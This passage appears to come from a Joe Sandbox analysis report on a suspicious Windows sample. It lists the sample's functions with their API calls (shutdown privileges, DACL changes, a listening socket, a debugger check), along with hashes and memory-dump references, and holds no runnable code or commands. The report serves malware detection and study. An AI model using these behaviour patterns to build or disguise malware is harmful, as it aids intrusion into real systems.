                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CreateDirectoryFullNamePath
                                                                                                                                                                  • String ID: :$\$\??\%s
                                                                                                                                                                  • API String ID: 2531775907-3457252023
                                                                                                                                                                  • Opcode ID: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                  • Instruction ID: 5b8928ca783b893dacbf0721098a8616f59dd17613a34138e213b27d6ec4c177
                                                                                                                                                                  • Opcode Fuzzy Hash: e3674d1d1678aa5b2072ca287ea13c599f7f343b69fea712d52b9408e430d9c0
                                                                                                                                                                  • Instruction Fuzzy Hash: EE413E726403186BD720DB54DC45FDFB3BCFF58710F00859AFA0896191EBB49A548BD8
                                                                                                                                                                  Function 004333BE Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 86shutdownCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 004333CE
                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004333D5
                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004333EA
                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 0043340E
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00433414
                                                                                                                                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00433437
                                                                                                                                                                  • InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?), ref: 00433466
                                                                                                                                                                  • SetSystemPowerState.KERNEL32(00000001,00000000), ref: 00433479
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ProcessSystemToken$AdjustCurrentErrorExitInitiateLastLookupOpenPowerPrivilegePrivilegesShutdownStateValueWindows
                                                                                                                                                                  • String ID: SeShutdownPrivilege
                                                                                                                                                                  • API String ID: 2938487562-3733053543
                                                                                                                                                                  • Opcode ID: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                  • Instruction ID: ad32a9094aef850e2966724807b7d50af50c82f056daff98c21d8f44207777ad
                                                                                                                                                                  • Opcode Fuzzy Hash: e998af62085c6697935ed50d35c6a1543144275e53dff9101095b3913992069c
                                                                                                                                                                  • Instruction Fuzzy Hash: F221C971640205ABF7108FA4EC4EF7FB3ACE708702F144569FE09D51D1D6BA5D408765
                                                                                                                                                                  Function 00446124 Relevance: 16.7, APIs: 11, Instructions: 182COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00436E45
                                                                                                                                                                    • Part of subcall function 00436E2B: GetLastError.KERNEL32(?,00000000,?), ref: 00436E4F
                                                                                                                                                                    • Part of subcall function 00436E2B: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00436E75
                                                                                                                                                                    • Part of subcall function 00436DF7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00436E12
                                                                                                                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044618A
                                                                                                                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004461BE
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 004461D0
                                                                                                                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0044620D
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00446229
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?), ref: 00446241
                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044626A
                                                                                                                                                                  • CopySid.ADVAPI32(00000000), ref: 00446271
                                                                                                                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004462A3
                                                                                                                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004462C5
                                                                                                                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004462D8
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1255039815-0
                                                                                                                                                                  • Opcode ID: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                  • Instruction ID: cbecfdc94e872455e881353a2ef69e95113e06a92746e25f2a634f38edc45108
                                                                                                                                                                  • Opcode Fuzzy Hash: cf498e736c0040d611dc61921388a4e783ba54ad69564fff20abd6321b712b19
                                                                                                                                                                  • Instruction Fuzzy Hash: C251BC71A00209BBEB10EFA1CD84EEFB778BF49704F01855EF515A7241D6B8DA05CB69
                                                                                                                                                                  Function 004788BD Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 217timefileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?,?), ref: 004788E4
                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00478924
                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478949
                                                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00478961
                                                                                                                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00478989
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileTime$FindLocal$CloseFirstSystem
                                                                                                                                                                  • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                                                                                                                                  • API String ID: 3238362701-2428617273
                                                                                                                                                                  • Opcode ID: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                  • Instruction ID: 8fd0730747e081185947bc4026d2fd3d0a29cbe563c255e8678d3cf3417a7967
                                                                                                                                                                  • Opcode Fuzzy Hash: 438ad41bdba169d6dbcdf3912f97c2a8dc3502a0945a742a170651836116907f
                                                                                                                                                                  • Instruction Fuzzy Hash: 32719772204300ABC310EF55CC85FAFB7E9AF88705F504D2FF645962D1E6B9E944875A
                                                                                                                                                                  Function 0045D619 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D627
                                                                                                                                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,?), ref: 0045D6B5
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0045D6BF
                                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,?), ref: 0045D751
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                                                                  • API String ID: 4194297153-14809454
                                                                                                                                                                  • Opcode ID: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                  • Instruction ID: 1f300c266cb1daf6abeae651b696e439ee3a0372042695327ab67fb83666ce96
                                                                                                                                                                  • Opcode Fuzzy Hash: 7585e308607772b0055f7746bf91c511cc03d2319b95ee688ecb5d1da683c46d
                                                                                                                                                                  • Instruction Fuzzy Hash: FE418235D00209DFCB10EFA5C884A9DB7B4FF48315F10846BE905AB352D7799A85CB69
                                                                                                                                                                  Function 0045A10F Relevance: 15.1, APIs: 10, Instructions: 120clipboardmemoryCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1737998785-0
                                                                                                                                                                  • Opcode ID: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                  • Instruction ID: d84b136cee2c902db59abfe4f82a3f409d39725fe24efd6a62fd8a04edebb5dd
                                                                                                                                                                  • Opcode Fuzzy Hash: bc1c5a0e04e7211697dd638385d424d337038878635646daacac479226a8eb74
                                                                                                                                                                  • Instruction Fuzzy Hash: 334114726001119FC310EFA5EC89B5EB7A4FF54315F00856EF909EB3A1EB75A941CB88
                                                                                                                                                                  Function 004033C0 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 359COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                                                                                                                                                  • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                                                                                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0040355C,?,?,?,00000010), ref: 00403B08
                                                                                                                                                                    • Part of subcall function 00403AF0: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,00000010), ref: 00403B41
                                                                                                                                                                  Strings
                                                                                                                                                                  • #include depth exceeded. Make sure there are no recursive includes, xrefs: 00428200
                                                                                                                                                                  • _, xrefs: 0040371C
                                                                                                                                                                  • Error opening the file, xrefs: 00428231
                                                                                                                                                                  • Unterminated string, xrefs: 00428348
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ByteCharCurrentDirectoryMultiWide$FullNamePath
                                                                                                                                                                  • String ID: #include depth exceeded. Make sure there are no recursive includes$Error opening the file$Unterminated string$_
                                                                                                                                                                  • API String ID: 522955547-188983378
                                                                                                                                                                  • Opcode ID: 3c35638c99be18d835dc8bf7441536bb52d07af4118373316f30b647345e0f32
                                                                                                                                                                  • Instruction ID: 51a390cb75b153cc6cab8b26b712b327f6f81406d0e69f910df9a3585dc9283e
                                                                                                                                                                  • Opcode Fuzzy Hash: 3c35638c99be18d835dc8bf7441536bb52d07af4118373316f30b647345e0f32
                                                                                                                                                                  • Instruction Fuzzy Hash: CCD105B1508341AAD710EF64D841AEFBBE8AF85304F404C2FF98553291DB79DA49C7AB
                                                                                                                                                                  Function 0043305F Relevance: 12.1, APIs: 8, Instructions: 122COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,0000000E), ref: 004330A5
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 004330BD
                                                                                                                                                                  • LockResource.KERNEL32(00000000), ref: 004330CA
                                                                                                                                                                  • FindResourceW.KERNEL32(?,?,00000003), ref: 004330F7
                                                                                                                                                                  • LoadResource.KERNEL32(?,00000000), ref: 00433105
                                                                                                                                                                  • SizeofResource.KERNEL32(?,00000000), ref: 00433114
                                                                                                                                                                  • LockResource.KERNEL32(?), ref: 00433120
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Resource$FindLoadLock$Sizeof
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4215241788-0
                                                                                                                                                                  • Opcode ID: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                  • Instruction ID: 48d2d5a3af9b637b7fc6f2c6b5a7fdd3517197a5f8dc2ef3994740021b7ed835
                                                                                                                                                                  • Opcode Fuzzy Hash: b140e135c5f727b40d296f2f4b3108eaeb1a217ee9fa6a28346dce69b8385e70
                                                                                                                                                                  • Instruction Fuzzy Hash: C741F1322002146BDB10EF65EC84FAB37ADEB89321F00846BFD01C6245E779DA51C7A8
                                                                                                                                                                  Function 004652BE Relevance: 12.1, APIs: 8, Instructions: 97networkCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 0046530D
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 0046531C
                                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00465356
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00465363
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00465377
                                                                                                                                                                  • listen.WSOCK32(00000000,00000005), ref: 00465381
                                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004653A9
                                                                                                                                                                  • closesocket.WSOCK32(00000000,00000000), ref: 004653BD
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 540024437-0
                                                                                                                                                                  • Opcode ID: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                  • Instruction ID: 689f190a2b8ca197395c4559ba4ec64c13dad074e2778b61c05f6be918bdb8b0
                                                                                                                                                                  • Opcode Fuzzy Hash: 56b395d1b7441155ee1d78469f99a9871a9e2360f64803e3ab449944eb02724f
                                                                                                                                                                  • Instruction Fuzzy Hash: A8319331200500ABD310EF25DD89B6EB7A8EF44725F10866EF855E73D1DBB4AC818B99
                                                                                                                                                                  Function 00452492 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 128filesleepCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 004524DF
                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 0045250B
                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?), ref: 004525E9
                                                                                                                                                                  • FindClose.KERNEL32(?), ref: 004525FF
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Find$File$CloseFirstNextSleep
                                                                                                                                                                  • String ID: *.*$\VH
                                                                                                                                                                  • API String ID: 1749430636-2657498754
                                                                                                                                                                  • Opcode ID: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                  • Instruction ID: de376bcde865418ddd8e10142a6165d1fec8b8ecf5afc9fd422e88b207ce0255
                                                                                                                                                                  • Opcode Fuzzy Hash: 952b61541a12346a9a2631e93aef0720ba9757898c7ad2f9180af277910d7a38
                                                                                                                                                                  • Instruction Fuzzy Hash: 37417F7190021DABDB14DF64CD58AEE77B4AF49305F14445BEC09A3281E678EE49CB98
                                                                                                                                                                  Function 0041A208 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00421FC1
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00421FD6
                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(pqI), ref: 00421FE1
                                                                                                                                                                  • GetCurrentProcess.KERNEL32(C0000409), ref: 00421FFD
                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 00422004
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.703522910689.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.703522882928.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523034909.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523068392.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523098188.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523130972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  • Associated: 00000000.00000002.703523188484.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_8EhMjL3yNF.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                  • String ID: pqI
                                                                                                                                                                  • API String ID: 2579439406-2459173057
                                                                                                                                                                  • Opcode ID: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                  • Instruction ID: 2caf929301e55fbdfba35cdc3931bb3174c20cf3198a7c5bb5494214f042e870
                                                                                                                                                                  • Opcode Fuzzy Hash: 25dc777f16e4295b66819c01749bb17431433dcbcd396824bac5e12fb106518c
                                                                                                                                                                  • Instruction Fuzzy Hash: 9E21CDB45392059FCB50DF65FE456483BA4BB68304F5005BBF90987371E7B969818F0D
                                                                                                                                                                  Function 004238DA Relevance: 9.2, APIs: 6, Instructions: 156memoryfileCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                    • Part of subcall function 00420494: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,0042D7C1,0042D7C1,?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002), ref: 004204D6
                                                                                                                                                                    • Part of subcall function 00420494: GetLastError.KERNEL32(?,0041B188,00000000,00000000,00000000,00000002,00000000,00000002,00000000,?,0041B847,00000000,?,0042D7C1,0048D260,00000010), ref: 004204E3
                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00001000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 00423943
                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,00000000,00000109,00000000,?,?,004227D8,00000109,00000000), ref: 0042394A
